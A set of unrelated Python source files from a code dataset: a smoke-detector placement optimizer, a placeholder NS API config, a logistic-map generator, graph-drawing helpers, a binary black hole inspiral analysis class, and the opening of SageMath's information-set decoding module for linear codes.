            the smoke propagation information
        fixed_detectors : ArrayLike
            [x1, y1, x2, y2...] representing the fixed location of the smoke detectors
        bounds : ArrayLike
            [x_low, x_high, y_low, y_high] the bounds on the swept variable
        """
        # TODO refactor so this is the same as the other one
        time_func = make_total_lookup_function(xytimes)
        print(time_func)
        x_low, x_high, y_low, y_high = bounds
        xs = np.linspace(x_low, x_high)
        ys = np.linspace(y_low, y_high)
        grid_xs, grid_ys = np.meshgrid(xs, ys)
        grid_xs = grid_xs.flatten()
        grid_ys = grid_ys.flatten()
        grid = np.vstack((grid_xs, grid_ys)).transpose()
        print(grid.shape)
        times = []
        for xy in grid:
            # Candidate placement = fixed detectors plus the swept one.
            locations = np.hstack((fixed_detectors, xy))
            times.append(time_func(locations))
        plt.cla()
        plt.clf()
        cb = self.pmesh_plot(grid_xs, grid_ys, times, plt, max_val)
        # even and odd points
        fixed = plt.scatter(fixed_detectors[::2], fixed_detectors[1::2], c='k')
        plt.colorbar(cb)  # Add a colorbar to a plot
        if centers is not None:
            centers = plt.scatter(centers[::2], centers[1::2], c='w')
            plt.legend([fixed, centers], [
                "The fixed detectors", "Centers of smoke sources"])
        else:
            plt.legend([fixed], ["The fixed detectors"])
        plt.title("Effects of placing the last detector with {} fixed".format(
            int(len(fixed_detectors) / 2)))
        plt.show()
    def plot_3d(
            self,
            xs,
            ys,
            values,
            plotter,
            max_val=None,
            num_samples=50,
            is_3d=False,
            cmap=plt.cm.inferno):
        """
        convenience function to easily plot the sort of data we have
        """
        # Interpolate the scattered samples onto a regular grid for plotting.
        points = np.stack((xs, ys), axis=1)
        sample_points = (np.linspace(min(xs), max(xs), num_samples),
                         np.linspace(min(ys), max(ys), num_samples))
        xis, yis = np.meshgrid(*sample_points)
        flattened_xis = xis.flatten()
        flattened_yis = yis.flatten()
        interpolated = griddata(points, values, (flattened_xis, flattened_yis))
        reshaped_interpolated = np.reshape(interpolated, xis.shape)
        if max_val is not None:
            norm = mpl.colors.Normalize(0, max_val)
        else:
            norm = mpl.colors.Normalize()  # default
        fig = plt.figure()
        ax = plt.axes(projection='3d')
        cb = ax.plot_surface(
            xis,
            yis,
            reshaped_interpolated,
            cmap=cmap,
            norm=norm,
            edgecolor='none')
        ax.set_title('Surface plot')
        plt.show()
        return cb  # return the colorbar
    def visualize_all(
            self,
            objective_func,
            optimized_detectors,
            bounds,
            max_val=None,
            num_samples=30,
            verbose=False,
            is3d=False,
            log=False):
        """
        The goal is to do a sweep with each of the detectors leaving the others fixed
        """
        # set up the sampling locations
        x_low, x_high, y_low, y_high = bounds
        xs = np.linspace(x_low, x_high, num_samples)
        ys = np.linspace(y_low, y_high, num_samples)
        grid_xs, grid_ys = np.meshgrid(xs, ys)
        grid_xs = grid_xs.flatten()
        grid_ys = grid_ys.flatten()
        # This is a (n, 2) where each row is a point
        grid = np.vstack((grid_xs, grid_ys)).transpose()
        # create the subplots
        plt.cla()
        plt.clf()
        # f, ax = plt.subplots(int(len(optimized_detectors)/2), 1)
        f, ax = self.get_square_axis(len(optimized_detectors) / 2)
        num_samples = grid.shape[0]
        for i in range(0, len(optimized_detectors), 2):
            selected_detectors = np.concatenate(
                (optimized_detectors[:i], optimized_detectors[(i + 2):]), axis=0)  # get all but one
            repeated_selected = np.tile(np.expand_dims(
                selected_detectors, axis=0), reps=(num_samples, 1))
            locations = np.concatenate((grid, repeated_selected), axis=1)
            times = [objective_func(xys) for xys in locations]
            if isinstance(ax, np.ndarray):  # ax may be a lone Axes rather than an array
                which_plot = ax[int(i / 2)]
            else:
                which_plot = ax
            cb = self.pmesh_plot(
                grid_xs,
                grid_ys,
                times,
                which_plot,
                max_val,
                log=log)
            fixed = which_plot.scatter(
                selected_detectors[::2], selected_detectors[1::2], c='w', edgecolors='k')
            if verbose:
                which_plot.legend([fixed], ["the fixed detectors"])
                which_plot.set_xlabel("x location")
                which_plot.set_ylabel("y location")
        plt.colorbar(cb, ax=ax[-1])
        if PAPER_READY:
            # write out the number of sources
            plt.savefig(
                "vis/DetectorSweeps{:02d}Sources.png".format(
                    int(len(optimized_detectors) / 2)))
        f.suptitle("The effects of sweeping one detector with all other fixed")
        plt.show()
    def evaluate_optimization(self, sources, num_detectors, bounds=None,
                              genetic=True, visualize=True, num_iterations=10):
        """Run the optimizer repeatedly and collect per-run statistics.

        sources : ArrayLike
            list of (x, y, time) tuples
        num_detectors : int
            The number of detectors to place
        bounds : ArrayLike
            [x_low, x_high, y_low, y_high], will be computed from self.X, self.Y if None
        genetic : Boolean
            whether to use a genetic algorithm
        visualize : Boolean
            Whether to visualize the results
        num_iterations : int
            How many times to run the optimizer
        """
        # NOTE(review): self.optimize is not defined in this class body --
        # presumably provided elsewhere; confirm.
        vals = []
        locs = []
        iterations = []
        func_values = []
        for i in trange(num_iterations):
            res = self.optimize(
                sources,
                num_detectors,
                bounds=bounds,
                genetic=genetic,
                visualize=False)
            vals.append(res.fun)
            locs.append(res.x)
            iterations.append(res.nit)
            func_values.append(res.vals)
        if visualize:
            show_optimization_statistics(vals, iterations, locs)
            show_optimization_runs(func_values)
        return vals, locs, iterations, func_values
    def show_optimization_statistics(self, vals, iterations, locs):
        # Thin wrapper around the module-level function of the same name.
        show_optimization_statistics(vals, iterations, locs)
    def set_3d(self, value=False):
        """
        set whether it should be 3d
        """
        self.is3d = value
    def test_tqdm(self):
        # Sanity check that tqdm progress bars render in this environment.
        for _ in trange(30):  # For plotting progress
            sleep(0.5)
if __name__ == "__main__":  # Only run if this was run from the command line
    SDO = SDOptimizer()
    # NOTE(review): load_data/get_time_to_alarm are not defined in the visible
    # SDOptimizer class body -- presumably provided elsewhere; confirm.
    SDO.load_data(DATA_FILE)  # Load the data file
    X1, Y1, time_to_alarm1 = SDO.get_time_to_alarm(False)
    X2, Y2, time_to_alarm2 = SDO.example_time_to_alarm(
        (0, 1), (0, 1), (0.3, 0.7), False)
    ret_func = make_lookup(X1, Y1, time_to_alarm1)
    # NOTE(review): this total_ret_func is overwritten below before use.
    total_ret_func = make_total_lookup_function(
        [(X1, Y1, time_to_alarm1), (X2, Y2, time_to_alarm2)])
    # Three synthetic sources centered at these (x, y) pairs.
    CENTERS = [0.2, 0.8, 0.8, 0.8, 0.8, 0.2]
    x1, y1, z1 = SDO.example_time_to_alarm([0, 1], [0, 1], CENTERS[0:2], False)
    x2, y2, z2 = SDO.example_time_to_alarm([0, 1], [0, 1], CENTERS[2:4], False)
    x3, y3, z3 = SDO.example_time_to_alarm([0, 1], [0, 1], CENTERS[4:6], False)
    inputs = [(x1, y1, z1), (x2, y2, z2), (x3, y3, z3)]
    total_ret_func = make_total_lookup_function(inputs)
    BOUNDS = ((0, 1), (0, 1), (0, 1), (0, 1))  # constraints on inputs
    INIT = (0.51, 0.52, 0.47, 0.6, 0.55, 0.67)
    res = minimize(total_ret_func, INIT, method='COBYLA')
    print(res)
    x = res.x
| StarcoderdataPython |
1766124 | <gh_stars>1-10
# NS API key, get one at http://www.ns.nl/en/travel-information/ns-api
USERNAME = '<EMAIL>'  # account e-mail address (placeholder -- fill in)
APIKEY = '<KEY>'  # API key issued by NS (placeholder -- fill in)
DEPLOY_DIR = '' | StarcoderdataPython |
3375268 | <gh_stars>0
#!/usr/bin/env python
import data
import numpy
# Continuously generate point clouds and stream logistic-map iterations of
# them via the `data` module. Runs until interrupted.
if __name__ == "__main__":
    N = 100000
    while True:
        # Fresh batch of (r, x) pairs from the generator.
        points = [(r, x) for r, x in data.generate(N)]
        R = numpy.array([r for r, x in points])
        X = numpy.array([x for r, x in points])
        for i in range(100):
            # Send the first 8000 points of the current state.
            points = [(R[idx], X[idx]) for idx in range(8000)]
            data.send(points, N=1000 * N)
            for j in range(1000):
                # Iterate the logistic map x -> r*x*(1-x) elementwise.
                X = R * X * (1 - X)
1776351 | <gh_stars>0
# Copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utilitary functions.
"""
import re
import networkx as nx
import matplotlib.pyplot as plt
def flatten(x):
    """Yield the items of each iterable in *x*, one level deep."""
    for inner in x:
        for item in inner:
            yield item
def draw_graph(g, cut=tuple()):
    """Draw graph *g* with graphviz layout; edges in *cut* are drawn in red.

    *cut* is an iterable of (src, dst, edge_id) triples expressed in the
    original node names; they are remapped alongside the graph below.
    """
    # Relabel each node with its 'op' attribute appended (if any).
    mapping = {node: node+g.nodes[node].get('op', '') for node in g}
    cut = [(mapping[src], mapping[end], e_id) for src, end, e_id in cut]
    g = nx.relabel_nodes(g, mapping)
    pos=nx.nx_agraph.graphviz_layout(g, prog='dot')
    n_colors = [n_color(g, n) for n in g]
    el = set(g.edges)
    # Draw everything except the cut edges first...
    nx.draw(
        g,
        pos,
        with_labels=True,
        arrows=True,
        edgelist=list(el - set(cut)),
        node_color=n_colors,
        node_size=600)
    # ...then overlay the cut edges in red.
    if cut:
        nx.draw_networkx_edges(
            g,
            pos,
            edgelist=list(el & set(cut)),
            edge_color='r',
            arrows=True)
def is_split_node(n):
    """Return True if node name *n* ends in 's' optionally followed by one digit."""
    # Raw string for the regex; same pattern n_color uses to pick gray nodes.
    return bool(re.search(r's[0-9]?$', n))
def n_color(g, n):
    """Return the display colour for node *n* of graph *g*.

    IN nodes are pale green, OUT nodes beige, split nodes (names ending in
    's' or 's<digit>') light gray, and everything else light blue.
    """
    if g.nodes[n].get('IN'):
        return 'xkcd:pale green'
    if g.nodes[n].get('OUT'):
        return 'xkcd:beige'
    # Same split-node test as is_split_node(); raw string for the regex.
    if re.search(r's[0-9]?$', n):
        return 'xkcd:light gray'
    return 'xkcd:light blue'
def draw_graph_cut(g, cut):
    """Draw *g* with the edges in *cut* highlighted, then show the figure."""
    draw_graph(g, cut)
    plt.show()
| StarcoderdataPython |
3250819 | #!/usr/bin/env python
# coding: utf-8
import h5py
import numpy as np
from functools import reduce
from tqdm import tqdm
import disk.funcs as dfn
class binary_mbh(object):
    """Population of binary massive-black-hole inspirals loaded from an HDF5 file.

    Per-binary evolution arrays (separation, hardening rates from dynamical
    friction / loss cone / viscous disk / gravitational waves, etc.) are read
    once at construction; the find_R* methods locate the separation at which
    each hardening mechanism starts to dominate.
    """
    def __init__(self, filename):
        # Load everything eagerly; units are noted on each line.
        self.filename = filename
        with h5py.File(self.filename, 'r') as f:
            self.SubhaloMassInHalfRadType = np.array(f['meta/SubhaloMassInHalfRadType'])
            self.SubhaloSFRinHalfRad = np.array(f['meta/SubhaloSFRinHalfRad'])
            self.snapshot = np.array(f['meta/snapshot'])
            self.subhalo_id = np.array(f['meta/subhalo_id'])
            self.masses = np.array(f['evolution/masses']) #g
            self.mdot = np.array(f['evolution/mdot_eff']) #g/s
            self.sep = np.array(f['evolution/sep']) #cm
            self.dadt = np.array(f['evolution/dadt']) #cm/s
            self.dadt_df = np.array(f['evolution/dadt_df']) #cm/s
            self.dadt_gw = np.array(f['evolution/dadt_gw']) #cm/s
            self.dadt_lc = np.array(f['evolution/dadt_lc']) #cm/s
            self.dadt_vd = np.array(f['evolution/dadt_vd']) #cm/s
            self.scales = np.array(f['evolution/scales']) #NA
            self.times = np.array(f['evolution/times']) #s
            self.eccen = np.array(f['evolution/eccen']) #NA
            # Derived quantities: redshift from scale factor, component and
            # total masses, and the mass ratio q = m2/m1.
            self.z = (1./self.scales)-1 #NA
            self.m1 = self.masses[:,0]
            self.m2 = self.masses[:,1]
            self.mtot = self.m1+self.m2
            self.q = self.m2/self.m1
    def find_Rlc(self):
        """For each binary, find the first separation where loss-cone hardening dominates.

        Returns an (N, 3) array of [binary index, step index, separation];
        NaNs where no such step exists.
        """
        R_lc = np.zeros((self.sep.shape[0],3))
        for i in range(len(self.sep)):
            try:
                idx = reduce(np.intersect1d,(np.where(np.abs(self.dadt_lc[i])>np.abs(self.dadt_df[i]))[0],
                                             np.where(np.abs(self.dadt_lc[i])>np.abs(self.dadt_vd[i]))[0],
                                             np.where(np.abs(self.dadt_lc[i])>np.abs(self.dadt_gw[i]))[0]))[0]
                R_lc[i]=[i,idx,self.sep[i][idx]]
            # NOTE(review): bare except -- intended to catch the IndexError
            # from an empty intersection, but it swallows everything.
            except:
                R_lc[i]=[i,np.nan,np.nan]
        return R_lc
    def find_Rvd(self):
        """Like find_Rlc, but for the viscous-disk-dominated regime."""
        R_vd = np.zeros((self.sep.shape[0],3))
        for i in range(len(self.sep)):
            try:
                idx = reduce(np.intersect1d,(np.where(np.abs(self.dadt_vd[i])>np.abs(self.dadt_df[i]))[0],
                                             np.where(np.abs(self.dadt_vd[i])>np.abs(self.dadt_lc[i]))[0],
                                             np.where(np.abs(self.dadt_vd[i])>np.abs(self.dadt_gw[i]))[0]))[0]
                R_vd[i]=[i,idx,self.sep[i][idx]]
            # NOTE(review): bare except (see find_Rlc).
            except:
                R_vd[i]=[i,np.nan,np.nan]
        return R_vd
    def find_Rgw(self):
        """Like find_Rlc, but for the gravitational-wave-dominated regime."""
        R_gw = np.zeros((self.sep.shape[0],3))
        for i in range(len(self.sep)):
            try:
                idx = reduce(np.intersect1d,(np.where(np.abs(self.dadt_gw[i])>np.abs(self.dadt_df[i]))[0],
                                             np.where(np.abs(self.dadt_gw[i])>np.abs(self.dadt_lc[i]))[0],
                                             np.where(np.abs(self.dadt_gw[i])>np.abs(self.dadt_vd[i]))[0]))[0]
                R_gw[i]=[i,idx,self.sep[i][idx]]
            # NOTE(review): bare except (see find_Rlc).
            except:
                R_gw[i]=[i,np.nan,np.nan]
        return R_gw
    def find_mbin_at_Rvd(self):
        """
        finding mass growth upto disk phase

        Integrates mdot over all steps before the disk-dominated separation
        (falling back to the population median when a binary has none) and
        returns the binary mass at that point.
        """
        R_vd = self.find_Rvd()
        mbin_at_rdisk = np.zeros(self.mtot.size)
        for mm in range(self.mtot.size):
            ti = self.times[mm]
            mdoti = self.mdot[mm]
            if np.isnan(np.sum(R_vd[mm])):
                condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (self.sep[mm]>np.nanmedian(R_vd[:,-1]))
            else:
                condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (self.sep[mm]>R_vd[mm][-1])
            ti = ti[condition]
            mdoti = mdoti[condition]
            # Trapezoid-style integral of mdot over time.
            delta_ti = np.diff(ti)
            mdot_av = 0.5*(mdoti[1:]+mdoti[:-1])
            dmi = mdot_av*delta_ti
            mbin_at_rdisk[mm] = self.mtot[mm] + np.nansum(dmi)
        return mbin_at_rdisk
    def find_mrgr_idx(self):
        """Split binaries into (merged by z=0, not merged by z=0) index arrays.

        A binary that still has a z=0 entry has not merged; otherwise it did.
        """
        idx_merged_by_z0 =[]
        idx_not_merged_by_z0 =[]
        for i in range(len(self.z)):
            if 0 in self.z[i]:
                idx_not_merged_by_z0.append(i)
            else:
                # NOTE(review): `idx` is computed but never used.
                idx = np.where(np.isinf(self.z[i]))[0][0]
                idx_merged_by_z0.append(i)
        return np.array(idx_merged_by_z0), np.array(idx_not_merged_by_z0)
    def dm_disk_phase(self):
        """
        finding mass growth during disk phase

        Integrates accretion between the disk-dominated and GW-dominated
        separations, splitting mdot between the two components each step via
        dfn.dm1dm2_lk and updating q as the masses grow. Returns the final
        (m1, m2) arrays after the disk phase.
        """
        R_vd = self.find_Rvd()
        R_gw = self.find_Rgw()
        m1_after_disk = np.zeros(self.mtot.size)
        m2_after_disk = np.zeros(self.mtot.size)
        # NOTE(review): q_after_disk is filled in but never returned.
        q_after_disk = -1*np.ones(self.mtot.size)
        for mm in tqdm(range(self.mtot.size)):
            ti = self.times[mm]
            mdoti = self.mdot[mm]
            # Select the disk-phase steps, falling back to population medians
            # when a binary lacks a disk or GW transition of its own.
            if np.isnan(np.sum(R_vd[mm])):
                if np.isnan(np.sum(R_gw[mm])):
                    print ('this binary has niether a gas dominated phase nor a gw dominated phase')
                    condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (self.sep[mm]<=np.nanmedian(R_vd[:,-1]))
                else:
                    condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (R_gw[mm][-1]<self.sep[mm]) & (self.sep[mm] <=np.nanmedian(R_vd[:,-1]))
            else:
                if np.isnan(np.sum(R_gw[mm])):
                    #gas dominated all the way
                    condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (self.sep[mm]<=R_vd[mm][-1])
                else:
                    condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (R_gw[mm][-1]<self.sep[mm]) & (self.sep[mm]<=R_vd[mm][-1])
            ti = ti[condition]
            mdoti = mdoti[condition]
            delta_ti = np.diff(ti)
            mdot_av = 0.5*(mdoti[1:]+mdoti[:-1])
            cond_idx = np.where(condition==True)
            qi = self.q[mm]
            m1_fin = self.m1[mm]
            m2_fin = self.m2[mm]
            for jj in range(mdot_av.size):
                # Split the total accretion rate between the components.
                mdot1, mdot2 = dfn.dm1dm2_lk(qi, mdot_av[jj])
                dm1 = mdot1*delta_ti[jj]
                dm2 = mdot2*delta_ti[jj]
                m1_fin = m1_fin + dm1
                m2_fin = m2_fin + dm2
                qi = m2_fin/m1_fin
            m1_after_disk[mm] = m1_fin
            m2_after_disk[mm] = m2_fin
            q_after_disk[mm] = qi
        return m1_after_disk, m2_after_disk
    def mbin_after_insp(self):
        """
        finding mass growth for the whole inspiral

        Integrates mdot over every valid (0 < scale < 1) step and returns the
        total binary mass at the end of the inspiral.
        """
        # NOTE(review): R_vd is computed but never used in this method.
        R_vd = self.find_Rvd()
        mbin_after_insp = np.zeros(self.mtot.size)
        for mm in range(self.mtot.size):
            ti = self.times[mm]
            mdoti = self.mdot[mm]
            condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0)
            ti = ti[condition]
            mdoti = mdoti[condition]
            delta_ti = np.diff(ti)
            mdot_av = 0.5*(mdoti[1:]+mdoti[:-1])
            dmi = mdot_av*delta_ti
            dm = np.nansum(dmi)
            mbin_after_insp[mm] = self.mtot[mm] + dm
return mbin_after_insp | StarcoderdataPython |
24143 | # -*- coding: utf-8 -*-
r"""
Information-set decoding for linear codes
Information-set decoding is a probabilistic decoding strategy that
essentially tries to guess `k` correct positions in the received word,
where `k` is the dimension of the code. A codeword agreeing with the
received word on the guessed position can easily be computed, and their
difference is one possible error vector. A "correct" guess is assumed when
this error vector has low Hamming weight.
This simple algorithm is not very efficient in itself, but there are numerous
refinements to the strategy that make it very capable over rather large codes.
Still, the decoding algorithm is exponential in dimension of the code and the
log of the field size.
The ISD strategy requires choosing how many errors is deemed acceptable. One
choice could be `d/2`, where `d` is the minimum distance of the code, but
sometimes `d` is not known, or sometimes more errors are expected. If one
chooses anything above `d/2`, the algorithm does not guarantee to return a
nearest codeword.
AUTHORS:
- <NAME>, <NAME>, <NAME> (2016-02, 2017-06): initial
version
"""
#******************************************************************************
# Copyright (C) 2017 <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# http://www.gnu.org/licenses/
#******************************************************************************
from sage.all import ZZ, Integer, vector, SageObject, binomial
from .decoder import Decoder
def _format_decoding_interval(decoding_interval):
r"""
Format the decoding interval of an ISD decoder when calling ``_repr_`` or
``_latex_``.
EXAMPLES::
sage: from sage.coding.information_set_decoder import _format_decoding_interval
sage: _format_decoding_interval((0,3))
'up to 3'
sage: _format_decoding_interval((2,3))
'between 2 and 3'
sage: _format_decoding_interval((3,3))
'exactly 3'
"""
if decoding_interval[0] == 0:
return "up to {0}".format(decoding_interval[1])
if decoding_interval[0] == decoding_interval[1]:
return "exactly {0}".format(decoding_interval[0])
return "between {0} and {1}".format(decoding_interval[0], decoding_interval[1])
class InformationSetAlgorithm(SageObject):
    r"""
    Abstract class for algorithms for
    :class:`sage.coding.information_set_decoder.LinearCodeInformationSetDecoder`.

    To sub-class this class, override ``decode`` and ``calibrate``, and call the
    super constructor from ``__init__``.

    INPUT:

    - ``code`` -- A linear code for which to decode.

    - ``number_errors`` -- an integer, the maximal number of errors to accept as
      correct decoding. An interval can also be specified by giving a pair of
      integers, where both end values are taken to be in the interval.

    - ``algorithm_name`` -- A name for the specific ISD algorithm used (used for
      printing).

    - ``parameters`` -- (optional) A dictionary for setting the parameters of
      this ISD algorithm. Note that sanity checking this dictionary for the
      individual sub-classes should be done in the sub-class constructor.

    EXAMPLES::

        sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
        sage: LeeBrickellISDAlgorithm(codes.GolayCode(GF(2)), (0,4))
        ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 4 errors

    A minimal working example of how to sub-class::

        sage: from sage.coding.information_set_decoder import InformationSetAlgorithm
        sage: from sage.coding.decoder import DecodingError
        sage: class MinimalISD(InformationSetAlgorithm):
        ....:     def __init__(self, code, decoding_interval):
        ....:         super(MinimalISD, self).__init__(code, decoding_interval, "MinimalISD")
        ....:     def calibrate(self):
        ....:         self._parameters = { } # calibrate parameters here
        ....:         self._time_estimate = 10.0 # calibrated time estimate
        ....:     def decode(self, r):
        ....:         # decoding algorithm here
        ....:         raise DecodingError("I failed")
        sage: MinimalISD(codes.GolayCode(GF(2)), (0,4))
        ISD Algorithm (MinimalISD) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 4 errors
    """

    def __init__(self, code, decoding_interval, algorithm_name, parameters = None):
        r"""
        TESTS::

            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: LeeBrickellISDAlgorithm(codes.GolayCode(GF(2)), (0,4))
            ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 4 errors
        """
        self._code = code
        self._decoding_interval = decoding_interval
        self._algorithm_name = algorithm_name
        # Track whether the caller fixed the parameters explicitly; when they
        # did not, ``calibrate()`` is expected to choose them lazily (see
        # ``parameters()`` and ``time_estimate()`` below).
        if parameters:
            self._parameters = parameters
            self._parameters_specified = True
        else:
            self._parameters_specified = False

    def name(self):
        r"""
        Return the name of this ISD algorithm.

        EXAMPLES::

            sage: C = codes.GolayCode(GF(2))
            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: A = LeeBrickellISDAlgorithm(C, (0,2))
            sage: A.name()
            'Lee-Brickell'
        """
        return self._algorithm_name

    def decode(self, r):
        r"""
        Decode a received word using this ISD decoding algorithm.

        Must be overridden by sub-classes.

        EXAMPLES::

            sage: M = matrix(GF(2), [[1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0],\
                                     [0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1, 1],\
                                     [0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0],\
                                     [0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1],\
                                     [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1]])
            sage: C = codes.LinearCode(M)
            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: A = LeeBrickellISDAlgorithm(C, (2,2))
            sage: r = vector(GF(2), [1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
            sage: A.decode(r)
            (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
        """
        raise NotImplementedError

    def time_estimate(self):
        """
        Estimate for how long this ISD algorithm takes to perform a single decoding.

        The estimate is for a received word whose number of errors is within the
        decoding interval of this ISD algorithm.

        EXAMPLES::

            sage: C = codes.GolayCode(GF(2))
            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: A = LeeBrickellISDAlgorithm(C, (0,2))
            sage: A.time_estimate() #random
            0.0008162108571427874
        """
        # Lazily run calibration the first time the estimate is requested.
        if not hasattr(self, "_time_estimate"):
            self.calibrate()
        return self._time_estimate

    def calibrate(self):
        """
        Uses test computations to estimate optimal values for any parameters
        this ISD algorithm may take.

        Must be overridden by sub-classes.

        If ``self._parameters_specified`` is ``False``, this method shall set
        ``self._parameters`` to the best parameters estimated. It shall always
        set ``self._time_estimate`` to the time estimate of using
        ``self._parameters``.

        EXAMPLES::

            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: C = codes.GolayCode(GF(2))
            sage: A = LeeBrickellISDAlgorithm(C, (0,3))
            sage: A.calibrate()
            sage: A.parameters() #random
            {'search_size': 1}
        """
        raise NotImplementedError

    def code(self):
        r"""
        Return the code associated to this ISD algorithm.

        EXAMPLES::

            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: C = codes.GolayCode(GF(2))
            sage: A = LeeBrickellISDAlgorithm(C, (0,3))
            sage: A.code()
            [24, 12, 8] Extended Golay code over GF(2)
        """
        return self._code

    def decoding_interval(self):
        r"""
        A pair of integers specifying the interval of number of errors this
        ISD algorithm will attempt to correct.

        The interval includes both end values.

        EXAMPLES::

            sage: C = codes.GolayCode(GF(2))
            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: A = LeeBrickellISDAlgorithm(C, (0,2))
            sage: A.decoding_interval()
            (0, 2)
        """
        return self._decoding_interval

    def parameters(self):
        """
        Return any parameters this ISD algorithm uses.

        If the parameters have not already been set, efficient values will first
        be calibrated and returned.

        EXAMPLES::

            sage: C = codes.GolayCode(GF(2))
            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: A = LeeBrickellISDAlgorithm(C, (0,4), search_size=3)
            sage: A.parameters()
            {'search_size': 3}

        If not set, calibration will determine a sensible value::

            sage: A = LeeBrickellISDAlgorithm(C, (0,4))
            sage: A.parameters() #random
            {'search_size': 1}
        """
        # Same lazy-calibration pattern as ``time_estimate()``.
        if not hasattr(self, "_parameters"):
            self.calibrate()
        return self._parameters

    def __eq__(self, other):
        r"""
        Tests equality between ISD algorithm objects.

        EXAMPLES::

            sage: C = codes.GolayCode(GF(2))
            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: A = LeeBrickellISDAlgorithm(C, (0,4))
            sage: A == LeeBrickellISDAlgorithm(C, (0,4))
            True
            sage: A == LeeBrickellISDAlgorithm(C, (0,5))
            False
            sage: other_search = 1 if A.parameters()['search_size'] != 1 else 2
            sage: A == LeeBrickellISDAlgorithm(C, (0,4), search_size=other_search)
            False

        ISD Algorithm objects can be equal only if they have both calibrated
        the parameters, or if they both had it set and to the same value::

            sage: A2 = LeeBrickellISDAlgorithm(C, (0,4), search_size=A.parameters()['search_size'])
            sage: A == A2
            False
            sage: A2 == LeeBrickellISDAlgorithm(C, (0,4), search_size=A.parameters()['search_size'])
            True
        """
        # Parameters are only compared when both sides had them explicitly
        # specified; two calibrated instances compare equal regardless of
        # what calibration happened to pick.
        return isinstance(other, self.__class__)\
                and self.code() == other.code()\
                and self.decoding_interval() == other.decoding_interval()\
                and self._parameters_specified == other._parameters_specified\
                and (not self._parameters_specified or self.parameters() == other.parameters())

    def __hash__(self):
        r"""
        Returns the hash value of ``self``.

        EXAMPLES::

            sage: C = codes.GolayCode(GF(2))
            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: A = LeeBrickellISDAlgorithm(C, (0,4))
            sage: hash(A) #random
            5884357732955478461
            sage: C2 = codes.GolayCode(GF(3))
            sage: A2 = LeeBrickellISDAlgorithm(C2, (0,4))
            sage: hash(A) != hash(A2)
            True
        """
        # Hash via the string representation; note this does NOT include the
        # parameters, consistent with __eq__ ignoring calibrated parameters.
        return hash(str(self))

    def _repr_(self):
        r"""
        Returns a string representation of this ISD algorithm.

        EXAMPLES::

            sage: C = codes.GolayCode(GF(2))
            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: A = LeeBrickellISDAlgorithm(C, (0,4))
            sage: A
            ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 4 errors
        """
        # NOTE(review): the format string ends with a trailing space
        # ("errors ") — doctests pass because trailing whitespace is not
        # shown; confirm whether the space is intentional.
        return "ISD Algorithm ({}) for {} decoding {} errors ".format(self._algorithm_name, self.code(), _format_decoding_interval(self.decoding_interval()))

    def _latex_(self):
        r"""
        Returns a latex representation of this ISD algorithm.

        EXAMPLES::

            sage: C = codes.GolayCode(GF(2))
            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: A = LeeBrickellISDAlgorithm(C, (0,4))
            sage: latex(A)
            \textnormal{ISD Algorithm (Lee-Brickell) for }[24, 12, 8] \textnormal{ Extended Golay Code over } \Bold{F}_{2} \textnormal{decoding up to 4 errors}
        """
        return "\\textnormal{{ISD Algorithm ({}) for }}{} \\textnormal{{decoding {} errors}}".format(self._algorithm_name, self.code()._latex_(), _format_decoding_interval(self.decoding_interval()))
class LeeBrickellISDAlgorithm(InformationSetAlgorithm):
    r"""
    The Lee-Brickell algorithm for information-set decoding.

    For a description of the information-set decoding paradigm (ISD), see
    :class:`sage.coding.information_set_decoder.LinearCodeInformationSetDecoder`.

    This implements the Lee-Brickell variant of ISD, see [LB1988]_ for the
    original binary case, and [Pet2010]_ for the `q`-ary extension.

    Let `C` be a `[n, k]`-linear code over `GF(q)`, and let `r \in GF(q)^{n}` be
    a received word in a transmission. We seek the codeword whose Hamming
    distance from `r` is minimal. Let `p` and `w` be integers, such that `0\leq
    p\leq w`, Let `G` be a generator matrix of `C`, and for any set of indices
    `I`, we write `G_{I}` for the matrix formed by the columns of `G` indexed by
